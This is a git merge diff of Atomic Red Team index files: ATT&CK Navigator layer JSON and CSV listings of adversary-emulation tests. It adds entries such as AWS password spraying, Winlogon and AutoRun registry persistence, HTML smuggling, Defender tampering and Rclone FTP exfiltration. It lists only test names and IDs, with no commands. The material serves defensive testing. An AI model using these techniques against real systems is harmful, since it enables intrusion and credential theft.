Merge branch 'master' into patch-2

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Indexes-CSV/iaas-index.csv

@@ -6,6 +6,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
+credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh

atomics/Indexes/Indexes-CSV/index.csv

@@ -63,6 +63,7 @@ defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masq
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
+defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -326,6 +327,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Bl
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -384,6 +386,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
+defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -519,6 +522,8 @@ privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Set
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
@@ -556,12 +561,15 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
+privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
@@ -755,6 +763,8 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -789,6 +799,8 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
+persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
+persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
@@ -803,6 +815,7 @@ persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Exte
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
+persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
@@ -1018,6 +1031,7 @@ credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPass
 credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
+credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
 credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
 credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
 credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
@@ -1183,6 +1197,7 @@ discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,
 discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
 discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
 discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
+discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -1398,3 +1413,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
+exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -42,6 +42,7 @@ defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masq
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
